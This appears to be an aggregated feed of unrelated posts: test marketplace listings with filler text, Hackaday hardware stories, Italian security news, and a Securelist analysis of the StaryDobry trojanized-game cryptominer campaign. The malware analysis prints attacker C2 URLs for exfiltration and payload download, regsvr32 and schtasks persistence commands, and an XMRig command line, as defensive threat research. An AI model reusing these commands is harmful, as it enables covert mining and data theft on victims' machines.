test 3 friendica - Questo è un post automatico da FediMercatino.it

Prezzo: 22 €

sdfs saf sa fsadf saf sa fsadf sada

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

test test - Questo è un post automatico da FediMercatino.it

Prezzo: 33 €

wefwe wfwe wefw we

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

If you’ve played any of the versions of Nintendo’s Animal Crossing over the years, you’ll know that eventually you get to the point where you’ve maxed out your virtual house and filled it with all the furniture you could possibly want — which is arguably as close to “winning” the game as you can get.

But now thanks to the work of [decrazyo] there’s a piece of furniture that you can add to your Animal Crossing house that will never get old: an x86 emulator that boots Linux. As explained in the video below, this trick leverages the fact that Nintendo had already built a highly accurate Nintendo Entertainment System (NES) emulator into Animal Crossing on the GameCube, which could be used to run a handful of classic games from within the player’s virtual living room. But it turns out that you can get that emulator to load a user-provided ROM from the GameCube’s memory card, which opens the doors to all sorts of mischief.

In this case, all [decrazyo] had to do was prepare an NES ROM that booted into Linux. That might seem like a tall order, but considering he had already worked on a port of Unix to the classic console, it’s not like he was going in blind. He identified the minimal Embeddable Linux Kernel Subset (ELKS) as his target operating system, but wanted to avoid the hassle of re-writing the whole thing for the 8-bit CPU in the NES. That meant adding another emulator to the mix.

If porting Linux to the NES sounded tough, running an x86 emulator on the console must be pure madness. But in reality, it’s not far off from several projects we’ve seen in the past. If you can boot Linux on an ATmega328 via an emulated RISC-V processor, why not x86 on the NES? In both cases, the only problem is performance: the emulated system ends up running at only a tiny fraction of real-speed, meaning booting a full OS could take hours.

As if things couldn’t get complicated enough, when [decrazyo] tried to boot the x86 emulator ROM, Animal Crossing choked. It turned out (perhaps unsurprisingly) that his ROM was using some features the emulator didn’t support, and was using twice as much RAM as normal. Some re-writes to the emulator sorted out the unsupported features, but there was no getting around the RAM limitation. Ultimately, [decrazyo] had to create a patch for Animal Crossing that doubled the memory of the in-game emulator.

Still with us? So the final setup is a patched Animal Crossing, which is running an in-game NES emulator, which is running a ROM that contains an x86 emulator, which is finally booting a minimal Linux environment at something like 1/64th normal speed. Are we having fun yet?

Despite its age and cutesy appearance, the original Animal Crossing has turned out to be a surprisingly fertile playground for hackers.

youtube.com/embed/OooHTDMUSGY?…

hackaday.com/2025/02/18/give-y…

Prezzo: 3 €

es esfse sesef es

Questo è un articolo disponibile su FediMercatino.it

Si prega di rispondere con un messaggio diretto/privato al promotore dell'annuncio.

🔗 Link su FediMercatino.it per rispondere all'annuncio

C’è chi vive in tenda, chi in un edificio senza riscaldamento. I meno fortunati trovano un muro semi sicuro lungo la strada, costruiscono una struttura di legno e appoggiano sopra delle lenzuola come pareti. Tutti sono senza acqua corrente, senza bagno, senza cibo, senza abbastanza vestiti caldi, senza le medicine necessarie. Ci sono bimbi piccoli, alcuni piccolissimi, appena nati, donne incinte, anziani, malati, uomini e donne di ogni età.

iyezine.com/g4z4-surf-chronicl…

G4Z4 Surf Chronicles Update #1

G4Z4 Surf Chronicles Update #1 - C’è chi vive in tenda, chi in un edificio senza riscaldamento. I meno fortunati trovano un muro semi sicuro lungo la strada, costruiscono una struttura di legno e appoggiano sopra delle lenzuola come pareti.

^{Valentina Sala (In Your Eyes ezine)}

Introduction

On December 31, cybercriminals launched a mass infection campaign, aiming to exploit reduced vigilance and increased torrent traffic during the holiday season. Our telemetry detected the attack, which lasted for a month and affected individuals and businesses by distributing the XMRig cryptominer. This previously unidentified actor is targeting users worldwide—including in Russia, Brazil, Germany, Belarus and Kazakhstan—by spreading trojanized versions of popular games via torrent sites.

In this report, we analyze how the attacker evades detection and launches a sophisticated execution chain, employing a wide range of defense evasion techniques.

Kaspersky’s products detect this threat as
Trojan.Win64.StaryDobry.*, Trojan-Dropper.Win64.StaryDobry.*, HEUR:Trojan.Win64.StaryDobry.gen.

Initial infection

On December 31, while reviewing our telemetry, we first detected this massive infection. Further investigation revealed that the campaign was initially distributed via popular torrent trackers. Trojanized versions of popular games—such as BeamNG.drive, Garry’s Mod, Dyson Sphere Program, Universe Sandbox, and Plutocracy—were designed to launch a sophisticated infection chain, ultimately deploying a miner implant. These malicious releases were created in advance and uploaded around September 2024.

Infection timeline

Although the malicious releases were published by different authors, they were all cracked the same way.

Malicious torrent available for download

Among the compromised installers are popular simulator and sandbox games that require minimal disk space. Below is the distribution of affected users by game as of January 2025:

Infected users per game (download)

These releases, often referred to as “repacks”, were usually distributed in an archive. Let’s now take a closer look at one of the samples. Upon unpacking the archive, we found a trojanized installer.

Technical details

Trojanized installer

After launching the installer (a Windows 32-bit GUI executable), we were welcomed with a GUI screen showing three options: install the game, choose the language, or quit.

Installer screen

This installer was created with Inno Setup. After decompiling the installer, we examined its code and found an interesting functionality.

Decompiled installer code

This code is responsible for extracting the malicious files used in this attack. First, it decrypts unrar.dll using the DECR function, which is a proxy for the RARExtract function within the rar.dll library. RARExtract decrypts unrar.dll using AES encryption with a hard-coded key,
cls-precompx.dll. Next, additional files from the archive are dropped into the temporary directory, and execution proceeds to the RARGetDllVersion function within unrar.dll.

Unrar.dll dropper

First of all, the sample runs a series of methods to check if it’s being launched in a debugging environment. These methods search for debugger and sandbox modules injected into processes, and also check the registry and filesystem for certain popular software. If such software is detected, execution immediately terminates.

Anti-debug checks example

If the checks are passed, the malware executes cmd.exe to register unrar.dll as a command handler with regsvr32.exe. The sample attempts to query the following list of sites to determine the user’s IP address.
api.myip [.]com
ip-api [.]com
ipapi [.]co
freeipapi [.]com
ipwho [.]is
api.miip [.]my
This is done to identify the infected user’s location, specifically their country. If the malware fails to detect the IP address, it defaults the country code to
CNOrBY (meaning “China or Belarus”). Next, the sample sends a request to hxxps://pinokino[.]fun/donate_button/game_id=%s&donate_text=%s with the following substitutions:

• game_id = appended with DST_xxxx, where x represents digits. This value is passed as an argument from the installer; in this campaign, we discovered the variant DST_1448;
• donate_text = appended with the country code.

After this generic country check, the sample collects a fingerprint of the infected machine. This fingerprint consists of various parameters, forming a unique identifier as follows:
mac|machineId|username|country|windows|meminGB|numprocessors|video|game_id

This fingerprint is then encoded using URL-safe Base64 to be sent successfully over the network. Next, the malware retrieves MachineGUID from HKLM\Software\Microsoft\Cryptography and calculates its SHA256 checksum. It then collects 10 characters starting from the 20^th position (
SHA256(MachineGUID)[20:30]). This hexadecimal sequence is used as the filename for two newly created files: %SystemRoot%\%hash%.dat and %SystemRoot%\%hash%.efi. The first file contains the encoded fingerprint, while the second is an empty decoy. The creation time of the .dat file is spoofed with a random date between 01/01/2015 and 12/25/2021. This file stores the Base64-encoded fingerprint.
After this step, unrar.dll starts preparing to drop the decrypted MTX64.exe to the disk. First, it generates a new filename for the decrypted payload. The malware searches for files in %SystemRoot% or %SystemRoot%\Sysnative. If these directories are empty, the decrypted MTX64.exe is written to the disk as Windows.Graphics.ThumbnailHandler.dll. Otherwise, unrar.dll creates a new file and names it by choosing a random file from the specified directories, taking its name, trimming its extension and appending a random suffix from a predefined list. Besides suffixes, this list contains junk data, most likely added to evade signature-based detection.

Suffix list and junk data

For example, if the malware finds a file named msvc140.dll in %SystemRoot%, it removes the extension and appends the resulting
msvc140 with handler.dll (a random suffix from the list), resulting in msvc140handler.dll. The malware then writes the decrypted payload to the newly generated file in the %SystemRoot% folder.
After that, the sample opens the encrypted MTX64.exe and decrypts it using AES-128 with a hard-coded key,
cls-precompx.dll.
The loader also carries out resource spoofing. First of all, it scans the _res.rc file for DLL property names and values—such as CompanyName, FileVersion and so on—and creates a dictionary of (key, value) pairs. Then it takes a random DLL from the %SystemRoot% folder (exiting if nothing is found), extracts its property values using the VerQueryValueW WinAPI, and replaces the corresponding dictionary values. The resulting resources are embedded into the decrypted MTX64.exe DLL. This file is then saved under the name generated in the previous step. Finally, unrar.dll changes the creation time of the resulting DLL using the same spoofing method as for the fingerprint file.

Spoofed resources

The dropped DLL is installed using the following command:
cmd.exe /C "cd $system32 && regsvr32.exe /s %dropped_name%.dll"

MTX64

This DLL is based on a public project called EpubShellExtThumbnailHandler, a Windows Shell Extension Thumbnail Handler. This stage completely mimics the legitimate behavior up until the actual thumbnail handling. It gets registered as a .lnk (shortcut) file handler, so whenever a .lnk file is opened, the DLL tries to process its thumbnail. However, here the sample implements its own version of the GetThumbnail interface function, and creates a separate thread to perform its malicious activities.

First, this thread writes the current date and month in
dd-mm format to the %TEMP%\time_windows_com.ini file. This stage then retrieves MachineGUID from HKLM\SOFTWARE\Microsoft\Cryptography, calculates SHA256(MachineGUID)[20 : 30], just like unrar.dll did. After that, it checks %SystemRoot% for the .dat file with this name. The presence of this file confirms that the infection is uninterrupted, prompting the DLL to extract the fingerprint and make a query to the hard-coded threat actors’ domain in the following format, where the UID is the fingerprint’s SHA256 hash.hxxps://promouno[.]shop/check/uid=%s
The server sends back a JSON that looks like
{'code':'reg'}. After this, the DLL makes another query to the server with an additional field, data, which is the Base64-encoded fingerprint (uid remains the same):hxxps://promouno[.]shop/check/uid=%s&data=%s
Upon receiving this request, the server also sends a JSON. The malware checks its
code field, which must be equal to either 322 or 200. If it is, the sample proceeds to extract the MD5 checksum from the flmd field in the same JSON and download the next-stage payload from the following link:hxxps://promouno[.]shop/dloadm/uid=%s
Next, the sample calculates the MD5 checksum of the received payload (a kickstarter PE file), and checks this hash against the MD5 checksum from the JSON. If they match, the malware parses the PE structure to locate the Export Address Table, retrieves the
kickstarter function address, and executes it.

Kickstarter running

Kickstarter

The kickstarter PE has an encrypted blob in its resources. This stage reads the blob and stores it in a C++ vector of bytes.

Resource reading

After that, it chooses a random name for the payload using the same method as for MTX64.exe during the execution of unrar.dll. However, there is a difference: if nothing is found in %SystemRoot% or %SystemRoot%\Sysnative, it chooses Unix.Directory.IconHandler.dll as a default file name. The payload is saved to %appdata\Roaming\Microsoft\Credentials\%InstallDate%\. To locate the InstallDate directory, the DLL retrieves the system installation date from the registry subkey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate.

Then the blob is decrypted using the CryptoPP AES-128 implementation. The key consists of the sequence of bytes from
\x00 to \x10. The decrypted contents are written onto the disk. This executable also spoofs its resources using the same method as for MTX64.exe, after which it executes the following command:schtasks /create / tn %s /tr "regsvr32.exe /s %s" / st 00:00 /du 9999:59 / sc once / ri 1 /f
The first argument is the system installation date, while the second one is the path to the dropped DLL. A scheduled task to register a server with regsvr32.exe is created, using the first argument as its name, with a suppressed warning, set to trigger at 00:00. The loader sends a GET request to the hard-coded address
45.200.149[.]58/conf.txt, implicitly setting the request header to User-Agent: StupidSandwichAgent\r\n.
The loader then waits for a response from the server. If the response begins with act, the sample stops execution after creating the scheduled task. If the response is noactive, meaning the targeted device has not been registered previously, the sample tries to delete itself with the following command, which clears everything in the %temp% directory:

Cleanup

Unix.Directory.IconHandler.dll

Subsequently, Unix.Directory.IconHandler.dll creates a mutex named com_curruser_mttx. If this mutex has already been created, execution stops immediately. Then the DLL searches for the %TEMP%\_cache.binary file. If the sample can’t find it, it downloads the binary directly from
45.200.149[.]58 using a GET 44912.f request, with the same StupidSandwichAgent User-Agent header. This file is written to the temporary directory and then decrypted using AES-128 with the same key consisting of the \x00–\x10 byte sequence.
The sample proceeds to open the current process, look for SeDebugPrivilege in the process token, and adjust it if applicable. We believe this is done to inject code into a newly created cmd.exe process. The author chose the easiest way possible, copying the entire open source injector, including its debug strings:

Injector

After injecting the code into the command interpreter, the sample enters an endless loop, continuously checking for taskmgr.exe and procmon.exe in the list of running processes. If either process is detected, the sample is shut down.

Miner implant

This implant is a slightly modified XMRig miner executable. Instead of parsing command-line arguments, it constructs a predefined command line.
xmrig – url =45.200.149[.]58:1448 –algo= rx /0 –user=new-www –donate-level=1 –keepalive – nicehash –background –no-title –pass=x – cpu -max-threads-hint=%d
The last parameter is calculated from the CPU topology: the implant calls the GetSystemInfo API to check the number of processor cores. If there are fewer than 8, the miner does not start. Moreover, the attacker chose to host a mining pool server in their own infrastructure instead of using a public one.

XMRig parses the constructed command line using its built-in functionality. The miner also creates a separate thread to check for process monitors running in the system, using the same method as in the previous stage:

Anti-tracing

Victims

This campaign primarily targets regular users by distributing malicious repacks. Some organizations were also affected, but these seem to be compromised computers inside corporate infrastructures, rather than direct targets.

Most of the infections have been observed in Russia, with additional cases in Belarus, Kazakhstan, Germany, and Brazil.

Attribution

There are no clear links between this campaign and any previously known crimeware actors, making attribution difficult. However, the use of Russian language in the PDB suggests the campaign may have been developed by a Russian-speaking actor.

Conclusions

StaryDobry tends to be a one-shot campaign. To deliver the miner implant, the actors implemented a sophisticated execution chain that exploited users seeking free games. This approach helped the threat actors make the most out of the miner implant by targeting powerful gaming machines capable of sustaining mining activity. Additionally, the attacker’s use of DoH helped conceal communication with their infrastructure, making it harder to detect and trace the campaign.

Indicators of compromise

File hashes

15c0396687d4ff36657e0aa680d8ba42
461a0e74321706f5c99b0e92548a1986
821d29d3140dfd67fc9d1858f685e2ac
3c4d0a4dfd53e278b3683679e0656276
04b881d0a17b3a0b34cbdbf00ac19aa2
5cac1df1b9477e40992f4ee3cc2b06ed

Domains and IPs

45.200.149[.]58
45.200.149[.]146
45.200.149[.]148
hxxps://promouno[.]shop
hxxps://pinokino[.]fun

securelist.com/starydobry-camp…

Microsoft ha annunciato la rimozione della funzione Location History da Windows 10 e 11, eliminando di fatto la possibilità per le applicazioni di accedere alla cronologia delle posizioni del dispositivo. Una decisione che solleva interrogativi nel mondo della cybersecurity: una mossa per rafforzare la privacy o un cambiamento che potrebbe influenzare la sicurezza e la forensic analysis?

Cosa cambia con la rimozione della cronologia delle posizioni?

La funzione Location History consentiva ad applicazioni come Cortana di accedere alla posizione del dispositivo registrata nelle ultime 24 ore. Con la sua rimozione, questi dati non verranno più salvati localmente e l’opzione sparirà dalle impostazioni di Windows (Privacy & Security > Location).

Microsoft ha dichiarato: “Stiamo deprecando e rimuovendo la funzione Location History, un’API che permetteva a Cortana di accedere alle ultime 24 ore di cronologia delle posizioni del dispositivo quando la localizzazione era abilitata.”

L’API Geolocator.GetGeopositionHistoryAsync, che permetteva l’accesso ai dati memorizzati localmente, verrà dismessa. Ciò significa che le app non potranno più recuperare automaticamente le posizioni passate del dispositivo, eliminando un potenziale vettore di attacco ma anche uno strumento di monitoraggio.

Impatto sulla sicurezza e sulla forensic analysis

Questa decisione si inserisce in un trend più ampio di maggiore attenzione alla privacy, seguendo normative come GDPR e CCPA, che impongono restrizioni più severe sulla raccolta e conservazione dei dati personali. Tuttavia, la rimozione di questa funzione potrebbe avere effetti collaterali imprevisti:

• Limitazione delle indagini forensi: gli analisti di sicurezza spesso usano dati di localizzazione per individuare attività sospette o analizzare movimenti legati a minacce informatiche.
• Meno strumenti per le aziende: alcune organizzazioni utilizzano la cronologia delle posizioni per verificare accessi anomali o per migliorare la protezione dei dispositivi aziendali.
• Riduzione del rischio di esfiltrazione: la rimozione della cronologia delle posizioni potrebbe diminuire la superficie di attacco per i cybercriminali che sfruttano questi dati per tracciare utenti o pianificare attacchi mirati.

Microsoft consiglia agli sviluppatori di rivedere le proprie applicazioni e migrare verso nuove soluzioni che non dipendano dalla funzione obsoleta. Per gli utenti, invece, il consiglio è:

1. Disattivare i servizi di localizzazione nelle impostazioni di Windows se non necessari.
2. Cliccare su “Clear” per cancellare eventuali dati di posizione registrati nelle ultime 24 ore.

Privacy o limitazione della sicurezza?

Se da una parte Microsoft si allinea alla crescente richiesta di maggiore privacy e controllo sui dati, dall’altra questa rimozione potrebbe creare disagi a chi sfruttava la cronologia delle posizioni per funzioni avanzate, costringendo sviluppatori e aziende a ripensare le proprie strategie. Sarà interessante vedere quali soluzioni alternative emergeranno per colmare questo vuoto.

In un mondo digitale sempre più complesso e minaccioso, la vera sfida sarà trovare il giusto equilibrio tra tutela della privacy e capacità di difesa dalle minacce informatiche, senza compromettere né la sicurezza né l’innovazione.

L'articolo Microsoft elimina la cronologia delle posizioni su Windows. Scelta di privacy o rischio sicurezza? proviene da il blog della sicurezza informatica.

Logically we understand that the other planets in the solar system, as well as humanity’s contributions to the cosmos such as the Hubble Space Telescope and the International Space Station, are zipping around us somewhere — but it can be difficult to conceptualize. Is Jupiter directly above your desk? Is the ISS currently underneath you?

If you’ve ever found yourself wondering such things, you might want to look into making something like Space Monitor. Designed by [Kevin Assen], this little gadget is able to literally point out the locations of objects in space. Currently it’s limited to the ISS and Mars, but adding new objects to track is just a matter of loading in the appropriate orbital data.

In addition to slewing around its 3D printed indicator, the Space Monitor also features a round LCD that displays the object currently being tracked, as well as the weather. Reading through the list of features and capabilities of the ESP32-powered device, we get the impression that [Kevin] is using it as a sort of development platform for various concepts. Features like remote firmware updates and the ability to point smartphones to the device’s configuration page via on-screen QR aren’t necessarily needed on a personal-use device, but its great practice for when you do eventually send one of your creations out into the scary world beyond your workbench.

If you’re interested in something a bit more elaborate, check out this impressive multi-level satellite tracker we covered back in 2018.

youtube.com/embed/6-wM_a_eX-g?…

hackaday.com/2025/02/18/space-…

Meta ha annunciato il più grande progetto di cavo sottomarino mai realizzato, il Progetto Waterworth , che attraverserà cinque continenti.

Il progetto multimiliardario, che richiederà diversi anni, è stato annunciato sul blog dell’azienda. Meta afferma che rafforzerà la portata e l’affidabilità dell’infrastruttura digitale globale aprendo tre nuovi corridoi oceanici con l’elevata capacità, necessaria per promuovere le tecnologie di intelligenza artificiale.

Secondo l’azienda, l’intelligenza artificiale sta cambiando radicalmente vari ambiti della vita e Meta si impegna a essere all’avanguardia in questo processo tecnologico. Il progetto Waterworth fornirà l’accesso a tecnologie avanzate a milioni di persone in tutto il mondo.

Secondo le dichiarazioni del vicepresidente dell’ingegneria di rete di Meta, Ghai Nagarajan, e il responsabile degli investimenti di rete globali, Alex-Handra Aime, il progetto sarà il più grande progetto di cavo sottomarino nella storia dell’azienda. La sua lunghezza sarà di oltre 50.000 km, ovvero superiore alla circonferenza della Terra.

La rete sottomarina collegherà gli Stati Uniti, l’India, il Brasile, il Sudafrica e altre regioni chiave, promuovendo la cooperazione economica, l’inclusione digitale e lo sviluppo tecnologico. In particolare, il blog sottolinea che il Progetto Waterworth accelererà l’implementazione della strategia digitale dell’India.

Negli ultimi dieci anni Meta ha preso parte allo sviluppo di oltre 20 cavi sottomarini, implementando sistemi con 24 coppie di fibre invece delle standard 8-16. Il nuovo progetto proseguirà questa tendenza, creando la più lunga rete sottomarina ad alta capacità.

L’azienda inoltre prevede di utilizzare Tecniche innovative di posa dei cavi a profondità fino a 7 km e tecniche migliorate di interramento costiero per ridurre al minimo il rischio di danni causati dalle ancore delle navi e da altri pericoli.

Oltre al Progetto Waterworth , Meta sta formando una nuova divisione all’interno di Reality Labs che si concentrerà sullo sviluppo di robot umanoidi alimentati dall’intelligenza artificiale. Andrew Bosworth, CTO di Meta, ha dichiarato in una nota che il nuovo gruppo lavorerà alla creazione di robot per i consumatori utilizzando le capacità del modello Llama.

Inoltre, Meta prevede di espandere la propria presenza al dettaglio aprendo negozi propri, simili al Meta Lab Store , inaugurato a Los Angeles a novembre.

L'articolo Meta rivoluziona il web: Waterworth, il cavo sottomarino da 50.000 km! proviene da il blog della sicurezza informatica.

GameLook riporta che dopo quasi un anno di attesa, secondo le ultime notizie provenienti dai media stranieri, Apple ha presentato una domanda per collaborare con Alibaba allo sviluppo di un grande modello di intelligenza artificiale e attende l’approvazione del governo nazionale. In altre parole, in futuro Apple Intelligence in Cina fornirà agli utenti servizi di intelligenza artificiale pertinenti basati sul modello Tongyi Qianwen di Alibaba.

Sebbene negli ultimi anni la quota di mercato di Apple in Cina sia stata erosa dai marchi nazionali, secondo gli ultimi dati di IDC la quota di mercato di Apple in Cina sarà del 15,6% nel 2024, in calo di due punti percentuali rispetto al 2023.

Ma essendo una delle aziende con il più grande “spazio fantasy” e il più alto valore per l’utente al mondo, chiunque riesca a collaborare con Apple nell’ambito dell’intelligenza artificiale sarà senza dubbio in grado di cogliere l’iniziativa nell’era dell’intelligenza artificiale nell’ecosistema mobile.

Attualmente nei principali mercati esteri, il partner di Apple per questo servizio è ChatGPT di OpenAI.

Mentre i servizi intelligenti di Apple in Cina cominciano a prendere forma, GameLook, in quanto media, si sta anche chiedendo se il tutto sia utile per i comuni utenti cinesi e cosa significhi. Innanzitutto, per quanto riguarda la notizia della cooperazione di Alibaba con Apple, la prima domanda di molte persone debba essere: perché Alibaba e Tongyi Qianwen?

Dovresti sapere che la presenza di Alibaba non è la più forte nel mercato 2C e nel percorso AI. Dopotutto, c’è Doubao di ByteDance (DAU raggiunge i 17 milioni) davanti, e DeepSeek, che è stato recentemente al centro dell’attenzione e ha superato i 40 milioni di utenti attivi al giorno. Infatti, secondo quanto riportato dai media stranieri, Apple avrebbe scelto Alibaba dopo aver valutato i modelli sviluppati da Tencent, ByteDance, Alibaba e DeepSeek.

Secondo GameLook, Alibaba, in quanto fornitore di servizi cloud e azienda leader nel settore Internet nazionale, può fornire servizi più stabili e completi quando si confronta con clienti di grandissime dimensioni come Apple, in particolare nell’ambito della conformità governativa, ambito in cui Alibaba vanta anch’esso una notevole esperienza.

In questo senso, i nuovi arrivati ​​come DeepSeek sono ovviamente inferiori. È impossibile che quando gli utenti Apple domestici chiamano Siri, la risposta che ottengono sia “Il server è occupato, riprova più tardi”. In secondo luogo, Tongyi Qianwen di Alibaba è sempre stato uno dei modelli di intelligenza artificiale su larga scala più capaci in Cina. Oltre al modello di punta, Tongyi Qianwen di Alibaba, come DeepSeek, è sempre rimasto open source per la comunità e pertanto gode di una forte influenza nella comunità open source globale.

Secondo gli ultimi dati pubblicati ufficialmente da Alibaba, il suo ultimo modello Qwen2.5-Max ha ottenuto risultati paragonabili o addirittura superiori a quelli di DeepSeek, Llama, GPT-4o e altri modelli negli attuali test di benchmark sui modelli di grandi dimensioni più diffusi.

L'articolo Apple in Cina Sceglie l’AI Tongyi Qianwen Di Alibaba per Alimentare Siri proviene da il blog della sicurezza informatica.

Gli hacker filorussi del gruppo DXPLOIT hanno rivendicato un attacco DDoS ai danni del sito Research Italy, portale ufficiale del Ministero dell’Università e della Ricerca italiano (researchitaly.mur.gov.it/). L’azione è stata annunciata tramite il loro canale di comunicazione, dove hanno pubblicato anche prove dell’attacco attraverso un check host, dimostrando che il sito risulta irraggiungibile.

Secondo quanto riportato da DXPLOIT, il sito governativo italiano è stato messo offline tramite un attacco Distributed Denial of Service (DDoS), una tecnica che sovraccarica i server con un’enorme quantità di richieste fino a renderli inutilizzabili. Nel messaggio pubblicato dal gruppo, sono state fornite evidenze con un check-hostche conferma l’indisponibilità del sito. Inoltre, hanno condiviso un IP address (130.186.10.36) legato all’attacco.

Screenshot condivisi dagli hacker mostrano che il sito restituisce un errore 502 Bad Gateway, segnale tipico di un server sovraccarico o di una configurazione errata causata da un’elevata quantità di traffico malevolo.

Questo articolo è stato redatto attraverso l’utilizzo della piattaforma di Recorded Future, partner strategico di Red Hot Cyber e Leader Mondiale nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.

Attacchi DDoS: una minaccia crescente

Gli attacchi DDoS sono uno dei metodi più utilizzati dagli hacktivisti per colpire siti web istituzionali e governativi, soprattutto in periodi di tensione geopolitica. Negli ultimi anni, diversi gruppi filorussi hanno preso di mira paesi europei e NATO con campagne di attacco coordinate.

DXPLOIT non è il primo gruppo a colpire obiettivi italiani. Prima del loro attacco, altri hacker come NoName057(16) hanno ripetutamente preso di mira infrastrutture digitali dell’Italia, tra cui ministeri, aeroporti e aziende critiche.

Questi attacchi rientrano in una più ampia strategia di cyberwarfare, dove gruppi di hacktivisti e cybercriminali cercano di destabilizzare governi, aziende e istituzioni attraverso il sabotaggio digitale.

Italia sempre più bersaglio del cybercrime

Negli ultimi mesi, l’Italia è stata al centro di numerosi attacchi informatici provenienti da gruppi legati alla Russia, con obiettivi che spaziano dalla pubblica amministrazione alle infrastrutture critiche. Le istituzioni stanno lavorando per rafforzare le difese, ma la minaccia resta elevata, con la possibilità di nuovi attacchi in futuro.

L’attacco di DXPLOIT è solo l’ultimo di una lunga serie. Resta da vedere come le autorità italiane risponderanno e se verranno adottate misure di contrasto più efficaci per proteggere i sistemi informatici nazionali.

L'articolo Hacker filorussi di DXPLOIT colpiscono il sito Research Italy con un attacco DDoS proviene da il blog della sicurezza informatica.

Rev up your browsers, package managers, or whatever other tool you use to avail yourself of new software releases, because the KiCAD team have announced that barring any major bugs being found in the next few hours, tomorrow should see the release of version 9 of the open source EDA suite. Who knows, depending on where you are in the world that could have already happened when you read this.

Skimming through the long list of enhancements brought into this version there’s one thing that strikes us; how this is now a list of upgrades and tweaks to a stable piece of software rather than essential features bringing a rough and ready package towards usability. There was a time when using KiCAD was a frustrating experience of many quirks and interface annoyances, but successive versions have improved it beyond measure. We would pass comment that we wished all open source software was as polished, but the fact is that much of the commercial software in this arena is not as good as this.

So head on over and kick the tires on this new KiCAD release, assuming that it passes those final checks. We look forward tot he community’s verdict on it.

hackaday.com/2025/02/17/get-re…

We’ve all got our health-related crosses to bear, and even if you’re currently healthy, it’s only a matter of time before entropy catches up to you. For [Markus Bindhammer], it caught up to him in a big way: liver disease, specifically cirrhosis. The disease has a lot of consequences, none of which are pleasant, like abnormally high ammonia concentration in the blood. So naturally, [Markus] built an ammonia analyzer to monitor his blood.

Measuring the amount of ammonia in blood isn’t as straightforward as you think. Yes, there are a few cheap MEMS-based sensors, but they tend to be good only for qualitative measurements, and other solid-state sensors that are more quantitative tend to be pretty expensive since they’re mostly intended for industrial applications. [Marb]’s approach is based on the so-called Berthelot method, which uses a two-part reagent. In the presence of ammonia (or more precisely, ammonium ions), the reagent generates a dark blue-green species that absorbs light strongly at 660 nm. Measuring the absorbance at that wavelength gives an approximation of the ammonia concentration.

[Marb]’s implementation of this process uses a two-stage reactor. The first stage heats and stirs the sample in a glass tube using a simple cartridge heater from a 3D printer head and a stirrer made from a stepper motor with a magnetic arm. Heating the sample volatilizes any ammonia in it, which mixes with room air pumped into the chamber by a small compressor. The ammonia-laden air moves to the second chamber containing the Berthelot reagent, stirred by another stepper-powered stir plate. A glass frit diffuses the gas into the reagent, and a 660-nm laser and photodiode detect any color change. The video below shows the design and construction of the micro lab along with some test runs.

We wish [Markus] well in his journey, of course, especially since he’s been an active part of our community for years. His chemistry-related projects run the gamut from a homebrew gas chromatograph to chemical flip flops, with a lot more to boot.

youtube.com/embed/AdfZKD2SkI0?…

hackaday.com/2025/02/17/integr…

[Michael Wessel] found some of his old DOS 3D graphics software and tried to run it on an 8088 PC. The tale of adding an 8087 co-processor to speed up the rendering was anything but straightforward, resulting in a useful little project.

There was a point around the end of the 1980s when the world of PCs had moved on to the 386, but the humble 8086 and 8088 hung around at the consumer end of the market. For Europeans that meant a variety of non-standard machines with brand names such as Amstrad and Schneider, and even surprisingly, later on Sinclair and Commodore too.

Of these the Schneider Euro PC was an all-in-one design reminiscent of an Amiga or Atari ST, packing a serviceable 8088 PC with a single 3.5″ floppy drive. A cheap machine like this was never thought to need an 8087, and lacked the usual socket on the motherboard, so he made a small PCB daughter board for the 8088 socket with space for both chips.

It’s a surprisingly simple circuit, as obviously the two chips were meant to exist together. It certainly had the desired effect on his frame rate, though we’re not sure how many other Euro PC users will need it. It does make us curious though, as to how quickly a modern microcontroller could emulate an 8087 for an even faster render time. Meanwhile if you’re curious about the 8087, of course [Ken Shirriff] has taken a look at it.

hackaday.com/2025/02/17/a-forg…

The world of computer enthusiasts has over time generated many subcultures and fandoms, each of which has in turn spawned its own media. [Intric8] has shared the tale of his falling down a rabbit hole as he traced one of them, a particularly esoteric disk magazine for the Commodore 64. The disks are bright yellow, and come with intricate home-made jackets and labels. Sticking them into a 1541 drive does nothing, because these aren’t standard fare, instead they require GEOS and a particularly upgraded machine. They appear at times in Commodore swap meets, and since they formed a periodical there are several years’ worth to collect that extend into the 2000s, long after the heyday of the 64.

Picking up nuggets of information over time, he traces them to Oregon, and the Astoria Commodore User Group, and to [Lord Ronin], otherwise known as David Mohr. Sadly the magazine ended with his death in 2009, but until then he produced an esoteric selection of stories, adventure games, and other software for surely one of the most exclusive computer clubs in existence. It’s a fascinating look into computer culture from before the Internet, even though by 2009 the Internet had well and truly eclipsed it, when disks like these were treasured for the information they contained. So if you find any of these yellow Penny Farthing disks, make sure that they or at least their contents are preserved.

Surprisingly, this isn’t the only odd format disk magazine we’ve seen.

hackaday.com/2025/02/17/probab…

Although the Earth’s magnetic field is reliable enough for navigation and is also essential for blocking harmful solar emissions and for improving radio communications, it’s not a uniform strength everywhere on the planet. Much like how inconsistencies in the density of the materials of the planet can impact the local gravitational force ever so slightly, so to can slight changes impact the strength of the magnetic field from place to place. And it doesn’t take too much to measure this impact on your own, as [efeyenice983] demonstrates here.

To measure this local field strength, the first item needed is a working compass. With the compass aligned to north, a magnet is placed with its poles aligned at a right angle to the compass. The deflection angle of the needle is noted for varying distances of the magnet, and with some quick math the local field strength of the Earth’s magnetic field can be calculated based on the strength of the magnet and the amount of change of the compass needle when under its influence.

Using this method, [efeyenice983] found that the Earth’s magnetic field strength at their location was about 0.49 Gauss, which is well within 0.25 to 0.65 Gauss that is typically found on the planet’s surface. Not only does the magnetic field strength vary with location, it’s been generally decreasing in strength on average over the past century or so as well, and the poles themselves aren’t stationary either. Check out this article which shows just how much the poles have shifted over the last few decades.

hackaday.com/2025/02/17/measur…

Doesn’t this look fantastic? Hard to believe it, but the base of this keyboard began life as a cutting board, and there’s a gallery to prove it. This is actually [androidbrick]’s second foray into this type of upcycling.

